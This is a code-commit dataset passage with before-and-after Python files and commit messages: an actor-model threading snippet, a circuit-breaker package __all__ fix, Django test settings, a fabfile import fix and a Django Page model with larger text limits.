print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message):
spawn(self.behavior, message, method='process')
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
Allow arg to specify spawning type
|
import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message, method='thread'):
spawn(self.behavior, message, method)
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
|
<commit_before>import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message):
spawn(self.behavior, message, method='process')
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
<commit_msg>Allow arg to specify spawning type<commit_after>
|
import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message, method='thread'):
spawn(self.behavior, message, method)
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
|
import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message):
spawn(self.behavior, message, method='process')
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
Allow arg to specify spawning typeimport os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message, method='thread'):
spawn(self.behavior, message, method)
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
|
<commit_before>import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message):
spawn(self.behavior, message, method='process')
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
<commit_msg>Allow arg to specify spawning type<commit_after>import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message, method='thread'):
spawn(self.behavior, message, method)
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
|
9f600d66f76d023926d1c1a6c974bd1abba40cfb
|
breakers/__init__.py
|
breakers/__init__.py
|
# -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = [Breaker, ]
__version__ = '0.1'
|
# -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = ['Breaker', ]
__version__ = '0.1'
|
Fix __all__ on module entry point
|
Fix __all__ on module entry point
|
Python
|
apache-2.0
|
marcusmartins/breakers
|
# -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = [Breaker, ]
__version__ = '0.1'
Fix __all__ on module entry point
|
# -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = ['Breaker', ]
__version__ = '0.1'
|
<commit_before># -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = [Breaker, ]
__version__ = '0.1'
<commit_msg>Fix __all__ on module entry point<commit_after>
|
# -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = ['Breaker', ]
__version__ = '0.1'
|
# -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = [Breaker, ]
__version__ = '0.1'
Fix __all__ on module entry point# -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = ['Breaker', ]
__version__ = '0.1'
|
<commit_before># -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = [Breaker, ]
__version__ = '0.1'
<commit_msg>Fix __all__ on module entry point<commit_after># -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = ['Breaker', ]
__version__ = '0.1'
|
926a7e3f8bc3808160bcab439e62b5848345d6f5
|
tests/settings.py
|
tests/settings.py
|
# -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'OPTIONS': {
'builtins': ["easy_pjax.templatetags.pjax_tags"],
'context_processors': ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
|
# -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"APP_DIRS": True,
"OPTIONS": {
"builtins": ["easy_pjax.templatetags.pjax_tags"],
"context_processors": ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
|
Use double quotes for strings
|
Use double quotes for strings
|
Python
|
bsd-3-clause
|
nigma/django-easy-pjax,nigma/django-easy-pjax,nigma/django-easy-pjax
|
# -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'OPTIONS': {
'builtins': ["easy_pjax.templatetags.pjax_tags"],
'context_processors': ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
Use double quotes for strings
|
# -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"APP_DIRS": True,
"OPTIONS": {
"builtins": ["easy_pjax.templatetags.pjax_tags"],
"context_processors": ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
|
<commit_before># -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'OPTIONS': {
'builtins': ["easy_pjax.templatetags.pjax_tags"],
'context_processors': ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
<commit_msg>Use double quotes for strings<commit_after>
|
# -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"APP_DIRS": True,
"OPTIONS": {
"builtins": ["easy_pjax.templatetags.pjax_tags"],
"context_processors": ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
|
# -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'OPTIONS': {
'builtins': ["easy_pjax.templatetags.pjax_tags"],
'context_processors': ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
Use double quotes for strings# -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"APP_DIRS": True,
"OPTIONS": {
"builtins": ["easy_pjax.templatetags.pjax_tags"],
"context_processors": ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
|
<commit_before># -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'OPTIONS': {
'builtins': ["easy_pjax.templatetags.pjax_tags"],
'context_processors': ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
<commit_msg>Use double quotes for strings<commit_after># -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"APP_DIRS": True,
"OPTIONS": {
"builtins": ["easy_pjax.templatetags.pjax_tags"],
"context_processors": ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
|
4df20c02934e431568105467ee44374bedddf4a5
|
fabfile/dbengine.py
|
fabfile/dbengine.py
|
###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import pgsql_*
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
|
###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import (
pgsql_createuser,
pgsql_dropdb,
pgsql_createdb,
pgsql_dropuser,
)
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
|
Fix 'cant import from .postgresql'
|
Fix 'cant import from .postgresql'
|
Python
|
agpl-3.0
|
miing/mci_migo,miing/mci_migo,miing/mci_migo
|
###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import pgsql_*
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
Fix 'cant import from .postgresql'
|
###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import (
pgsql_createuser,
pgsql_dropdb,
pgsql_createdb,
pgsql_dropuser,
)
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
|
<commit_before>###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import pgsql_*
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
<commit_msg>Fix 'cant import from .postgresql'<commit_after>
|
###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import (
pgsql_createuser,
pgsql_dropdb,
pgsql_createdb,
pgsql_dropuser,
)
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
|
###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import pgsql_*
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
Fix 'cant import from .postgresql'###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import (
pgsql_createuser,
pgsql_dropdb,
pgsql_createdb,
pgsql_dropuser,
)
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
|
<commit_before>###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import pgsql_*
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
<commit_msg>Fix 'cant import from .postgresql'<commit_after>###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import (
pgsql_createuser,
pgsql_dropdb,
pgsql_createdb,
pgsql_dropuser,
)
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
|
2201aaeffb93713adcdf20f5868b5a90b562efda
|
pages/models.py
|
pages/models.py
|
from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=8192, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=1024, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=1024, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=1024, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=1024, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
|
from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=16384, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=16384, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=16384, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=16384, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=16384, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
|
Increase character limit for pages
|
Increase character limit for pages
Closes #70.
|
Python
|
isc
|
ashbc/tgrsite,ashbc/tgrsite,ashbc/tgrsite
|
from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=8192, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=1024, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=1024, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=1024, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=1024, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
Increase character limit for pages
Closes #70.
|
from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=16384, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=16384, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=16384, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=16384, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=16384, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
|
<commit_before>from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=8192, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=1024, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=1024, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=1024, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=1024, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
<commit_msg>Increase character limit for pages
Closes #70.<commit_after>
|
from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=16384, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=16384, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=16384, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=16384, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=16384, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
|
from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=8192, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=1024, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=1024, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=1024, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=1024, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
Increase character limit for pages
Closes #70.from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=16384, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=16384, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=16384, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=16384, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=16384, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
|
